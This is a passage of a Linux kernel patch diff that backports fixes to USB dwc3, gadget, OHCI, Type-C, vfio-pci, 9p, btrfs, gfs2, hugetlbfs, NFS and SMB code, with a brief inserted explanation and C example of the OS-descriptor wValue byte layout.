+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 889c122dad457..472a6a7e1558a 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -1558,6 +1558,7 @@ int dwc3_event_buffers_setup(struct dwc3 *dwc);
+ void dwc3_event_buffers_cleanup(struct dwc3 *dwc);
+ 
+ int dwc3_core_soft_reset(struct dwc3 *dwc);
++void dwc3_enable_susphy(struct dwc3 *dwc, bool enable);
+ 
+ #if IS_ENABLED(CONFIG_USB_DWC3_HOST) || IS_ENABLED(CONFIG_USB_DWC3_DUAL_ROLE)
+ int dwc3_host_init(struct dwc3 *dwc);
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index b134110cc2ed5..2d7ac92ce9b84 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2831,6 +2831,7 @@ static int __dwc3_gadget_start(struct dwc3 *dwc)
+ 	dwc3_ep0_out_start(dwc);
+ 
+ 	dwc3_gadget_enable_irq(dwc);
++	dwc3_enable_susphy(dwc, true);
+ 
+ 	return 0;
+ 
+@@ -4573,6 +4574,7 @@ void dwc3_gadget_exit(struct dwc3 *dwc)
+ 	if (!dwc->gadget)
+ 		return;
+ 
++	dwc3_enable_susphy(dwc, false);
+ 	usb_del_gadget(dwc->gadget);
+ 	dwc3_gadget_free_endpoints(dwc);
+ 	usb_put_gadget(dwc->gadget);
+diff --git a/drivers/usb/dwc3/host.c b/drivers/usb/dwc3/host.c
+index f4d8e80c4c347..c0dba453f1b8e 100644
+--- a/drivers/usb/dwc3/host.c
++++ b/drivers/usb/dwc3/host.c
+@@ -10,9 +10,30 @@
+ #include <linux/irq.h>
+ #include <linux/of.h>
+ #include <linux/platform_device.h>
++#include <linux/usb.h>
++#include <linux/usb/hcd.h>
+ 
++#include "../host/xhci-plat.h"
+ #include "core.h"
+ 
++static void dwc3_xhci_plat_start(struct usb_hcd *hcd)
++{
++	struct platform_device *pdev;
++	struct dwc3 *dwc;
++
++	if (!usb_hcd_is_primary_hcd(hcd))
++		return;
++
++	pdev = to_platform_device(hcd->self.controller);
++	dwc = dev_get_drvdata(pdev->dev.parent);
++
++	dwc3_enable_susphy(dwc, true);
++}
++
++static const struct xhci_plat_priv dwc3_xhci_plat_quirk = {
++	.plat_start = dwc3_xhci_plat_start,
++};
++
+ static void dwc3_host_fill_xhci_irq_res(struct dwc3 *dwc,
+ 					int irq, char *name)
+ {
+@@ -122,6 +143,11 @@ int dwc3_host_init(struct dwc3 *dwc)
+ 		}
+ 	}
+ 
++	ret = platform_device_add_data(xhci, &dwc3_xhci_plat_quirk,
++				       sizeof(struct xhci_plat_priv));
++	if (ret)
++		goto err;
++
+ 	ret = platform_device_add(xhci);
+ 	if (ret) {
+ 		dev_err(dwc->dev, "failed to register xHCI device\n");
+@@ -136,6 +162,7 @@ int dwc3_host_init(struct dwc3 *dwc)
+ 
+ void dwc3_host_exit(struct dwc3 *dwc)
+ {
++	dwc3_enable_susphy(dwc, false);
+ 	platform_device_unregister(dwc->xhci);
+ 	dwc->xhci = NULL;
+ }
+diff --git a/drivers/usb/gadget/composite.c b/drivers/usb/gadget/composite.c
+index 247cca46cdfae..f10e43a948fd8 100644
+--- a/drivers/usb/gadget/composite.c
++++ b/drivers/usb/gadget/composite.c
+@@ -1993,7 +1993,7 @@ composite_setup(struct usb_gadget *gadget, const struct usb_ctrlrequest *ctrl)
+ 			buf[5] = 0x01;
+ 			switch (ctrl->bRequestType & USB_RECIP_MASK) {
+ 			case USB_RECIP_DEVICE:
+-				if (w_index != 0x4 || (w_value >> 8))
++				if (w_index != 0x4 || (w_value & 0xff))
+ 					break;
+ 				buf[6] = w_index;
+ 				/* Number of ext compat interfaces */
+@@ -2009,9 +2009,9 @@ composite_setup(struct usb_gadget *gadget, const struct usb_ctrlrequest *ctrl)
+ 				}
+ 				break;
+ 			case USB_RECIP_INTERFACE:
+-				if (w_index != 0x5 || (w_value >> 8))
++				if (w_index != 0x5 || (w_value & 0xff))
+ 					break;
+-				interface = w_value & 0xFF;
++				interface = w_value >> 8;
+ 				if (interface >= MAX_CONFIG_INTERFACES ||
+ 				    !os_desc_cfg->interface[interface])
+ 					break;
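The composite.c hunk above follows the Microsoft OS 1.0 descriptor convention for these feature requests: wValue carries the interface number in its high byte and the page number in its low byte, which the old code had swapped. A standalone decode of that layout:

#include <stdint.h>
#include <stdio.h>

static int decode(uint16_t w_value, uint8_t *interface)
{
	if (w_value & 0xff)	/* non-zero page number: not handled here */
		return -1;
	*interface = w_value >> 8;	/* interface lives in the high byte */
	return 0;
}

int main(void)
{
	uint8_t intf;

	/* Interface 2, page 0 -> wValue 0x0200 */
	if (!decode(0x0200, &intf))
		printf("interface %u\n", intf);	/* prints 2 */
	return 0;
}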
+diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
+index 3e59055aa5040..b2da74bb107af 100644
+--- a/drivers/usb/gadget/function/f_fs.c
++++ b/drivers/usb/gadget/function/f_fs.c
+@@ -3414,7 +3414,7 @@ static int ffs_func_setup(struct usb_function *f,
+ 	__ffs_event_add(ffs, FUNCTIONFS_SETUP);
+ 	spin_unlock_irqrestore(&ffs->ev.waitq.lock, flags);
+ 
+-	return creq->wLength == 0 ? USB_GADGET_DELAYED_STATUS : 0;
++	return ffs->ev.setup.wLength == 0 ? USB_GADGET_DELAYED_STATUS : 0;
+ }
+ 
+ static bool ffs_func_req_match(struct usb_function *f,
+diff --git a/drivers/usb/host/ohci-hcd.c b/drivers/usb/host/ohci-hcd.c
+index 0457dd9f6c19a..ab175e181e55c 100644
+--- a/drivers/usb/host/ohci-hcd.c
++++ b/drivers/usb/host/ohci-hcd.c
+@@ -888,6 +888,7 @@ static irqreturn_t ohci_irq (struct usb_hcd *hcd)
+ 	/* Check for an all 1's result which is a typical consequence
+ 	 * of dead, unclocked, or unplugged (CardBus...) devices
+ 	 */
++again:
+ 	if (ints == ~(u32)0) {
+ 		ohci->rh_state = OHCI_RH_HALTED;
+ 		ohci_dbg (ohci, "device removed!\n");
+@@ -982,6 +983,13 @@ static irqreturn_t ohci_irq (struct usb_hcd *hcd)
+ 	}
+ 	spin_unlock(&ohci->lock);
+ 
++	/* repeat until all enabled interrupts are handled */
++	if (ohci->rh_state != OHCI_RH_HALTED) {
++		ints = ohci_readl(ohci, &regs->intrstatus);
++		if (ints && (ints & ohci_readl(ohci, &regs->intrenable)))
++			goto again;
++	}
++
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/drivers/usb/host/xhci-plat.h b/drivers/usb/host/xhci-plat.h
+index 1fb149d1fbcea..f3abce238207e 100644
+--- a/drivers/usb/host/xhci-plat.h
++++ b/drivers/usb/host/xhci-plat.h
+@@ -8,7 +8,9 @@
+ #ifndef _XHCI_PLAT_H
+ #define _XHCI_PLAT_H
+ 
+-#include "xhci.h"	/* for hcd_to_xhci() */
++struct device;
++struct platform_device;
++struct usb_hcd;
+ 
+ struct xhci_plat_priv {
+ 	const char *firmware_name;
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index bf615dc8085e9..bbcc0e0aa070a 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1479,7 +1479,8 @@ static void svdm_consume_identity(struct tcpm_port *port, const u32 *p, int cnt)
+ 	port->partner_ident.cert_stat = p[VDO_INDEX_CSTAT];
+ 	port->partner_ident.product = product;
+ 
+-	typec_partner_set_identity(port->partner);
++	if (port->partner)
++		typec_partner_set_identity(port->partner);
+ 
+ 	tcpm_log(port, "Identity: %04x:%04x.%04x",
+ 		 PD_IDH_VID(vdo),
+@@ -1567,6 +1568,9 @@ static void tcpm_register_partner_altmodes(struct tcpm_port *port)
+ 	struct typec_altmode *altmode;
+ 	int i;
+ 
++	if (!port->partner)
++		return;
++
+ 	for (i = 0; i < modep->altmodes; i++) {
+ 		altmode = typec_partner_register_altmode(port->partner,
+ 						&modep->altmode_desc[i]);
+@@ -2416,7 +2420,7 @@ static int tcpm_register_sink_caps(struct tcpm_port *port)
+ {
+ 	struct usb_power_delivery_desc desc = { port->negotiated_rev };
+ 	struct usb_power_delivery_capabilities_desc caps = { };
+-	struct usb_power_delivery_capabilities *cap;
++	struct usb_power_delivery_capabilities *cap = port->partner_source_caps;
+ 
+ 	if (!port->partner_pd)
+ 		port->partner_pd = usb_power_delivery_register(NULL, &desc);
+@@ -2426,6 +2430,9 @@ static int tcpm_register_sink_caps(struct tcpm_port *port)
+ 	memcpy(caps.pdo, port->sink_caps, sizeof(u32) * port->nr_sink_caps);
+ 	caps.role = TYPEC_SINK;
+ 
++	if (cap)
++		usb_power_delivery_unregister_capabilities(cap);
++
+ 	cap = usb_power_delivery_register_capabilities(port->partner_pd, &caps);
+ 	if (IS_ERR(cap))
+ 		return PTR_ERR(cap);
+@@ -3635,7 +3642,10 @@ static int tcpm_init_vconn(struct tcpm_port *port)
+ 
+ static void tcpm_typec_connect(struct tcpm_port *port)
+ {
++	struct typec_partner *partner;
++
+ 	if (!port->connected) {
++		port->connected = true;
+ 		/* Make sure we don't report stale identity information */
+ 		memset(&port->partner_ident, 0, sizeof(port->partner_ident));
+ 		port->partner_desc.usb_pd = port->pd_capable;
+@@ -3645,9 +3655,13 @@ static void tcpm_typec_connect(struct tcpm_port *port)
+ 			port->partner_desc.accessory = TYPEC_ACCESSORY_AUDIO;
+ 		else
+ 			port->partner_desc.accessory = TYPEC_ACCESSORY_NONE;
+-		port->partner = typec_register_partner(port->typec_port,
+-						       &port->partner_desc);
+-		port->connected = true;
++		partner = typec_register_partner(port->typec_port, &port->partner_desc);
++		if (IS_ERR(partner)) {
++			dev_err(port->dev, "Failed to register partner (%ld)\n", PTR_ERR(partner));
++			return;
++		}
++
++		port->partner = partner;
+ 		typec_partner_set_usb_power_delivery(port->partner, port->partner_pd);
+ 	}
+ }
+@@ -3717,9 +3731,11 @@ static int tcpm_src_attach(struct tcpm_port *port)
+ static void tcpm_typec_disconnect(struct tcpm_port *port)
+ {
+ 	if (port->connected) {
+-		typec_partner_set_usb_power_delivery(port->partner, NULL);
+-		typec_unregister_partner(port->partner);
+-		port->partner = NULL;
++		if (port->partner) {
++			typec_partner_set_usb_power_delivery(port->partner, NULL);
++			typec_unregister_partner(port->partner);
++			port->partner = NULL;
++		}
+ 		port->connected = false;
+ 	}
+ }
+@@ -3935,6 +3951,9 @@ static enum typec_cc_status tcpm_pwr_opmode_to_rp(enum typec_pwr_opmode opmode)
+ 
+ static void tcpm_set_initial_svdm_version(struct tcpm_port *port)
+ {
++	if (!port->partner)
++		return;
++
+ 	switch (port->negotiated_rev) {
+ 	case PD_REV30:
+ 		break;
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 98f335cbbcdea..a163218fdc749 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -855,7 +855,7 @@ void ucsi_connector_change(struct ucsi *ucsi, u8 num)
+ 	struct ucsi_connector *con = &ucsi->connector[num - 1];
+ 
+ 	if (!(ucsi->ntfy & UCSI_ENABLE_NTFY_CONNECTOR_CHANGE)) {
+-		dev_dbg(ucsi->dev, "Bogus connector change event\n");
++		dev_dbg(ucsi->dev, "Early connector change event\n");
+ 		return;
+ 	}
+ 
+@@ -1248,6 +1248,7 @@ static int ucsi_init(struct ucsi *ucsi)
+ {
+ 	struct ucsi_connector *con, *connector;
+ 	u64 command, ntfy;
++	u32 cci;
+ 	int ret;
+ 	int i;
+ 
+@@ -1300,6 +1301,15 @@ static int ucsi_init(struct ucsi *ucsi)
+ 
+ 	ucsi->connector = connector;
+ 	ucsi->ntfy = ntfy;
++
++	mutex_lock(&ucsi->ppm_lock);
++	ret = ucsi->ops->read(ucsi, UCSI_CCI, &cci, sizeof(cci));
++	mutex_unlock(&ucsi->ppm_lock);
++	if (ret)
++		return ret;
++	if (UCSI_CCI_CONNECTOR(cci))
++		ucsi_connector_change(ucsi, UCSI_CCI_CONNECTOR(cci));
++
+ 	return 0;
+ 
+ err_unregister:
+diff --git a/drivers/vfio/pci/vfio_pci.c b/drivers/vfio/pci/vfio_pci.c
+index 1d4919edfbde4..a3ed9ab477486 100644
+--- a/drivers/vfio/pci/vfio_pci.c
++++ b/drivers/vfio/pci/vfio_pci.c
+@@ -71,6 +71,8 @@ static bool vfio_pci_dev_in_denylist(struct pci_dev *pdev)
+ 		case PCI_DEVICE_ID_INTEL_QAT_C62X_VF:
+ 		case PCI_DEVICE_ID_INTEL_QAT_DH895XCC:
+ 		case PCI_DEVICE_ID_INTEL_QAT_DH895XCC_VF:
++		case PCI_DEVICE_ID_INTEL_DSA_SPR0:
++		case PCI_DEVICE_ID_INTEL_IAX_SPR0:
+ 			return true;
+ 		default:
+ 			return false;
+diff --git a/fs/9p/vfs_file.c b/fs/9p/vfs_file.c
+index aec43ba837992..87222067fe5de 100644
+--- a/fs/9p/vfs_file.c
++++ b/fs/9p/vfs_file.c
+@@ -667,6 +667,7 @@ const struct file_operations v9fs_file_operations = {
+ 	.splice_read = generic_file_splice_read,
+ 	.splice_write = iter_file_splice_write,
+ 	.fsync = v9fs_file_fsync,
++	.setlease = simple_nosetlease,
+ };
+ 
+ const struct file_operations v9fs_file_operations_dotl = {
+@@ -708,4 +709,5 @@ const struct file_operations v9fs_mmap_file_operations_dotl = {
+ 	.splice_read = generic_file_splice_read,
+ 	.splice_write = iter_file_splice_write,
+ 	.fsync = v9fs_file_fsync_dotl,
++	.setlease = simple_nosetlease,
+ };
+diff --git a/fs/9p/vfs_inode.c b/fs/9p/vfs_inode.c
+index 5e2657c1dbbe6..8f287009545c9 100644
+--- a/fs/9p/vfs_inode.c
++++ b/fs/9p/vfs_inode.c
+@@ -85,7 +85,7 @@ static int p9mode2perm(struct v9fs_session_info *v9ses,
+ 	int res;
+ 	int mode = stat->mode;
+ 
+-	res = mode & S_IALLUGO;
++	res = mode & 0777; /* S_IRWXUGO */
+ 	if (v9fs_proto_dotu(v9ses)) {
+ 		if ((mode & P9_DMSETUID) == P9_DMSETUID)
+ 			res |= S_ISUID;
+@@ -181,6 +181,9 @@ int v9fs_uflags2omode(int uflags, int extended)
+ 		break;
+ 	}
+ 
++	if (uflags & O_TRUNC)
++		ret |= P9_OTRUNC;
++
+ 	if (extended) {
+ 		if (uflags & O_EXCL)
+ 			ret |= P9_OEXCL;
+diff --git a/fs/9p/vfs_super.c b/fs/9p/vfs_super.c
+index 2d9ee073d12c3..7c35347f1d9be 100644
+--- a/fs/9p/vfs_super.c
++++ b/fs/9p/vfs_super.c
+@@ -342,6 +342,7 @@ static const struct super_operations v9fs_super_ops = {
+ 	.alloc_inode = v9fs_alloc_inode,
+ 	.free_inode = v9fs_free_inode,
+ 	.statfs = simple_statfs,
++	.drop_inode = v9fs_drop_inode,
+ 	.evict_inode = v9fs_evict_inode,
+ 	.show_options = v9fs_show_options,
+ 	.umount_begin = v9fs_umount_begin,
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index 539bc9bdcb93f..5f923c9b773e0 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -1324,19 +1324,14 @@ int btrfs_alloc_page_array(unsigned int nr_pages, struct page **page_array)
+ 		unsigned int last = allocated;
+ 
+ 		allocated = alloc_pages_bulk_array(GFP_NOFS, nr_pages, page_array);
+-
+-		if (allocated == nr_pages)
+-			return 0;
+-
+-		/*
+-		 * During this iteration, no page could be allocated, even
+-		 * though alloc_pages_bulk_array() falls back to alloc_page()
+-		 * if  it could not bulk-allocate. So we must be out of memory.
+-		 */
+-		if (allocated == last)
++		if (unlikely(allocated == last)) {
++			/* No progress, fail and do cleanup. */
++			for (int i = 0; i < allocated; i++) {
++				__free_page(page_array[i]);
++				page_array[i] = NULL;
++			}
+ 			return -ENOMEM;
+-
+-		memalloc_retry_wait(GFP_NOFS);
++		}
+ 	}
+ 	return 0;
+ }
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index f7f4bcc094642..10ded9c2be03b 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -2472,7 +2472,7 @@ void btrfs_clear_delalloc_extent(struct inode *vfs_inode,
+ 		 */
+ 		if (bits & EXTENT_CLEAR_META_RESV &&
+ 		    root != fs_info->tree_root)
+-			btrfs_delalloc_release_metadata(inode, len, false);
++			btrfs_delalloc_release_metadata(inode, len, true);
+ 
+ 		/* For sanity tests. */
+ 		if (btrfs_is_testing(fs_info))
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 754a9fb0165fa..ec3db315f5618 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -7955,8 +7955,8 @@ long btrfs_ioctl_send(struct inode *inode, struct btrfs_ioctl_send_args *arg)
+ 	sctx->rbtree_new_refs = RB_ROOT;
+ 	sctx->rbtree_deleted_refs = RB_ROOT;
+ 
+-	sctx->clone_roots = kvcalloc(sizeof(*sctx->clone_roots),
+-				     arg->clone_sources_count + 1,
++	sctx->clone_roots = kvcalloc(arg->clone_sources_count + 1,
++				     sizeof(*sctx->clone_roots),
+ 				     GFP_KERNEL);
+ 	if (!sctx->clone_roots) {
+ 		ret = -ENOMEM;
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 5549c843f0d3f..a7853a3a57190 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -1440,6 +1440,7 @@ static noinline int commit_fs_roots(struct btrfs_trans_handle *trans)
+ 			radix_tree_tag_clear(&fs_info->fs_roots_radix,
+ 					(unsigned long)root->root_key.objectid,
+ 					BTRFS_ROOT_TRANS_TAG);
++			btrfs_qgroup_free_meta_all_pertrans(root);
+ 			spin_unlock(&fs_info->fs_roots_radix_lock);
+ 
+ 			btrfs_free_log(trans, root);
+@@ -1464,7 +1465,6 @@ static noinline int commit_fs_roots(struct btrfs_trans_handle *trans)
+ 			if (ret2)
+ 				return ret2;
+ 			spin_lock(&fs_info->fs_roots_radix_lock);
+-			btrfs_qgroup_free_meta_all_pertrans(root);
+ 		}
+ 	}
+ 	spin_unlock(&fs_info->fs_roots_radix_lock);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index ab5d410d560e7..8c7e74499ed17 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -1233,25 +1233,32 @@ static int open_fs_devices(struct btrfs_fs_devices *fs_devices,
+ 	struct btrfs_device *device;
+ 	struct btrfs_device *latest_dev = NULL;
+ 	struct btrfs_device *tmp_device;
++	int ret = 0;
+ 
+ 	flags |= FMODE_EXCL;
+ 
+ 	list_for_each_entry_safe(device, tmp_device, &fs_devices->devices,
+ 				 dev_list) {
+-		int ret;
++		int ret2;
+ 
+-		ret = btrfs_open_one_device(fs_devices, device, flags, holder);
+-		if (ret == 0 &&
++		ret2 = btrfs_open_one_device(fs_devices, device, flags, holder);
++		if (ret2 == 0 &&
+ 		    (!latest_dev || device->generation > latest_dev->generation)) {
+ 			latest_dev = device;
+-		} else if (ret == -ENODATA) {
++		} else if (ret2 == -ENODATA) {
+ 			fs_devices->num_devices--;
+ 			list_del(&device->dev_list);
+ 			btrfs_free_device(device);
+ 		}
++		if (ret == 0 && ret2 != 0)
++			ret = ret2;
+ 	}
+-	if (fs_devices->open_devices == 0)
++
++	if (fs_devices->open_devices == 0) {
++		if (ret)
++			return ret;
+ 		return -EINVAL;
++	}
+ 
+ 	fs_devices->opened = 1;
+ 	fs_devices->latest_dev = latest_dev;
+@@ -3390,6 +3397,7 @@ static int btrfs_relocate_sys_chunks(struct btrfs_fs_info *fs_info)
+ 			 * alignment and size).
+ 			 */
+ 			ret = -EUCLEAN;
++			mutex_unlock(&fs_info->reclaim_bgs_lock);
+ 			goto error;
+ 		}
+ 
+diff --git a/fs/gfs2/bmap.c b/fs/gfs2/bmap.c
+index e7537fd305dd2..9ad11e5bf14c3 100644
+--- a/fs/gfs2/bmap.c
++++ b/fs/gfs2/bmap.c
+@@ -1702,7 +1702,8 @@ static int punch_hole(struct gfs2_inode *ip, u64 offset, u64 length)
+ 	struct buffer_head *dibh, *bh;
+ 	struct gfs2_holder rd_gh;
+ 	unsigned int bsize_shift = sdp->sd_sb.sb_bsize_shift;
+-	u64 lblock = (offset + (1 << bsize_shift) - 1) >> bsize_shift;
++	unsigned int bsize = 1 << bsize_shift;
++	u64 lblock = (offset + bsize - 1) >> bsize_shift;
+ 	__u16 start_list[GFS2_MAX_META_HEIGHT];
+ 	__u16 __end_list[GFS2_MAX_META_HEIGHT], *end_list = NULL;
+ 	unsigned int start_aligned, end_aligned;
+@@ -1713,7 +1714,7 @@ static int punch_hole(struct gfs2_inode *ip, u64 offset, u64 length)
+ 	u64 prev_bnr = 0;
+ 	__be64 *start, *end;
+ 
+-	if (offset >= maxsize) {
++	if (offset + bsize - 1 >= maxsize) {
+ 		/*
+ 		 * The starting point lies beyond the allocated meta-data;
+ 		 * there are no blocks do deallocate.
+diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c
+index 4fe4b3393e71c..330729445d8ab 100644
+--- a/fs/hugetlbfs/inode.c
++++ b/fs/hugetlbfs/inode.c
+@@ -1108,10 +1108,10 @@ static int hugetlbfs_migrate_folio(struct address_space *mapping,
+ 	if (rc != MIGRATEPAGE_SUCCESS)
+ 		return rc;
+ 
+-	if (hugetlb_page_subpool(&src->page)) {
+-		hugetlb_set_page_subpool(&dst->page,
+-					hugetlb_page_subpool(&src->page));
+-		hugetlb_set_page_subpool(&src->page, NULL);
++	if (hugetlb_folio_subpool(src)) {
++		hugetlb_set_folio_subpool(dst,
++					hugetlb_folio_subpool(src));
++		hugetlb_set_folio_subpool(src, NULL);
+ 	}
+ 
+ 	if (mode != MIGRATE_SYNC_NO_COPY)
+diff --git a/fs/nfs/client.c b/fs/nfs/client.c
+index f50e025ae4064..755256875052f 100644
+--- a/fs/nfs/client.c
++++ b/fs/nfs/client.c
+@@ -73,7 +73,6 @@ const struct rpc_program nfs_program = {
+ 	.number			= NFS_PROGRAM,
+ 	.nrvers			= ARRAY_SIZE(nfs_version),
+ 	.version		= nfs_version,
+-	.stats			= &nfs_rpcstat,
+ 	.pipe_dir_name		= NFS_PIPE_DIRNAME,
+ };
+ 
+@@ -496,6 +495,7 @@ int nfs_create_rpc_client(struct nfs_client *clp,
+ 			  const struct nfs_client_initdata *cl_init,
+ 			  rpc_authflavor_t flavor)
+ {
++	struct nfs_net		*nn = net_generic(clp->cl_net, nfs_net_id);
+ 	struct rpc_clnt		*clnt = NULL;
+ 	struct rpc_create_args args = {
+ 		.net		= clp->cl_net,
+@@ -507,6 +507,7 @@ int nfs_create_rpc_client(struct nfs_client *clp,
+ 		.servername	= clp->cl_hostname,
+ 		.nodename	= cl_init->nodename,
+ 		.program	= &nfs_program,
++		.stats		= &nn->rpcstats,
+ 		.version	= clp->rpc_ops->version,
+ 		.authflavor	= flavor,
+ 		.cred		= cl_init->cred,
+@@ -1142,6 +1143,8 @@ void nfs_clients_init(struct net *net)
+ #endif
+ 	spin_lock_init(&nn->nfs_client_lock);
+ 	nn->boot_time = ktime_get_real();
++	memset(&nn->rpcstats, 0, sizeof(nn->rpcstats));
++	nn->rpcstats.program = &nfs_program;
+ 
+ 	nfs_netns_sysfs_setup(nn, net);
+ }
+diff --git a/fs/nfs/inode.c b/fs/nfs/inode.c
+index e0c1fb98f907a..cf8c3771e4bfb 100644
+--- a/fs/nfs/inode.c
++++ b/fs/nfs/inode.c
+@@ -2333,12 +2333,21 @@ EXPORT_SYMBOL_GPL(nfs_net_id);
+ 
+ static int nfs_net_init(struct net *net)
+ {
++	struct nfs_net *nn = net_generic(net, nfs_net_id);
++
+ 	nfs_clients_init(net);
++
++	if (!rpc_proc_register(net, &nn->rpcstats)) {
++		nfs_clients_exit(net);
++		return -ENOMEM;
++	}
++
+ 	return nfs_fs_proc_net_init(net);
+ }
+ 
+ static void nfs_net_exit(struct net *net)
+ {
++	rpc_proc_unregister(net, "nfs");
+ 	nfs_fs_proc_net_exit(net);
+ 	nfs_clients_exit(net);
+ }
+@@ -2393,15 +2402,12 @@ static int __init init_nfs_fs(void)
+ 	if (err)
+ 		goto out1;
+ 
+-	rpc_proc_register(&init_net, &nfs_rpcstat);
+-
+ 	err = register_nfs_fs();
+ 	if (err)
+ 		goto out0;
+ 
+ 	return 0;
+ out0:
+-	rpc_proc_unregister(&init_net, "nfs");
+ 	nfs_destroy_directcache();
+ out1:
+ 	nfs_destroy_writepagecache();
+@@ -2431,7 +2437,6 @@ static void __exit exit_nfs_fs(void)
+ 	nfs_destroy_inodecache();
+ 	nfs_destroy_nfspagecache();
+ 	unregister_pernet_subsys(&nfs_net_ops);
+-	rpc_proc_unregister(&init_net, "nfs");
+ 	unregister_nfs_fs();
+ 	nfs_fs_proc_exit();
+ 	nfsiod_stop();
+diff --git a/fs/nfs/internal.h b/fs/nfs/internal.h
+index 35a8ae46b6c34..b3b801e7c4bc5 100644
+--- a/fs/nfs/internal.h
++++ b/fs/nfs/internal.h
+@@ -443,8 +443,6 @@ int nfs_try_get_tree(struct fs_context *);
+ int nfs_get_tree_common(struct fs_context *);
+ void nfs_kill_super(struct super_block *);
+ 
+-extern struct rpc_stat nfs_rpcstat;
+-
+ extern int __init register_nfs_fs(void);
+ extern void __exit unregister_nfs_fs(void);
+ extern bool nfs_sb_active(struct super_block *sb);
+diff --git a/fs/nfs/netns.h b/fs/nfs/netns.h
+index c8374f74dce11..a68b21603ea9a 100644
+--- a/fs/nfs/netns.h
++++ b/fs/nfs/netns.h
+@@ -9,6 +9,7 @@
+ #include <linux/nfs4.h>
+ #include <net/net_namespace.h>
+ #include <net/netns/generic.h>
++#include <linux/sunrpc/stats.h>
+ 
+ struct bl_dev_msg {
+ 	int32_t status;
+@@ -34,6 +35,7 @@ struct nfs_net {
+ 	struct nfs_netns_client *nfs_client;
+ 	spinlock_t nfs_client_lock;
+ 	ktime_t boot_time;
++	struct rpc_stat rpcstats;
+ #ifdef CONFIG_PROC_FS
+ 	struct proc_dir_entry *proc_nfsfs;
+ #endif
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index 338b34c99b2de..3fdafb9297f13 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -1045,18 +1045,45 @@ cifs_cancelled_callback(struct mid_q_entry *mid)
+ struct TCP_Server_Info *cifs_pick_channel(struct cifs_ses *ses)
+ {
+ 	uint index = 0;
++	unsigned int min_in_flight = UINT_MAX, max_in_flight = 0;
++	struct TCP_Server_Info *server = NULL;
++	int i;
+ 
+ 	if (!ses)
+ 		return NULL;
+ 
+-	/* round robin */
+-	index = (uint)atomic_inc_return(&ses->chan_seq);
+-
+ 	spin_lock(&ses->chan_lock);
+-	index %= ses->chan_count;
++	for (i = 0; i < ses->chan_count; i++) {
++		server = ses->chans[i].server;
++		if (!server)
++			continue;
++
++		/*
++		 * strictly speaking, we should pick up req_lock to read
++		 * server->in_flight. But it shouldn't matter much here if we
++		 * race while reading this data. The worst that can happen is
++		 * that we could use a channel that's not least loaded. Avoiding
++		 * taking the lock could help reduce wait time, which is
++		 * important for this function
++		 */
++		if (server->in_flight < min_in_flight) {
++			min_in_flight = server->in_flight;
++			index = i;
++		}
++		if (server->in_flight > max_in_flight)
++			max_in_flight = server->in_flight;
++	}
++
++	/* if all channels are equally loaded, fall back to round-robin */
++	if (min_in_flight == max_in_flight) {
++		index = (uint)atomic_inc_return(&ses->chan_seq);
++		index %= ses->chan_count;
++	}
++
++	server = ses->chans[index].server;
+ 	spin_unlock(&ses->chan_lock);
+ 
+-	return ses->chans[index].server;
++	return server;
+ }
+ 
+ int
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index 1253e9bde34c8..1b98796499d78 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -612,13 +612,23 @@ static int oplock_break_pending(struct oplock_info *opinfo, int req_op_level)
+ 
+ 		if (opinfo->op_state == OPLOCK_CLOSING)
+ 			return -ENOENT;
+-		else if (!opinfo->is_lease && opinfo->level <= req_op_level)
+-			return 1;
++		else if (opinfo->level <= req_op_level) {
++			if (opinfo->is_lease &&
++			    opinfo->o_lease->state !=
++			     (SMB2_LEASE_HANDLE_CACHING_LE |
++			      SMB2_LEASE_READ_CACHING_LE))
++				return 1;
++		}
+ 	}
+ 
+-	if (!opinfo->is_lease && opinfo->level <= req_op_level) {
+-		wake_up_oplock_break(opinfo);
+-		return 1;
++	if (opinfo->level <= req_op_level) {
++		if (opinfo->is_lease &&
++		    opinfo->o_lease->state !=
++		     (SMB2_LEASE_HANDLE_CACHING_LE |
++		      SMB2_LEASE_READ_CACHING_LE)) {
++			wake_up_oplock_break(opinfo);
++			return 1;
++		}
+ 	}
+ 	return 0;
+ }
+@@ -886,7 +896,6 @@ static int oplock_break(struct oplock_info *brk_opinfo, int req_op_level)
+ 		struct lease *lease = brk_opinfo->o_lease;
+ 
+ 		atomic_inc(&brk_opinfo->breaking_cnt);
+-
+ 		err = oplock_break_pending(brk_opinfo, req_op_level);
+ 		if (err)
+ 			return err < 0 ? err : 0;
+@@ -1199,7 +1208,9 @@ int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+ 
+ 	/* Only v2 leases handle the directory */
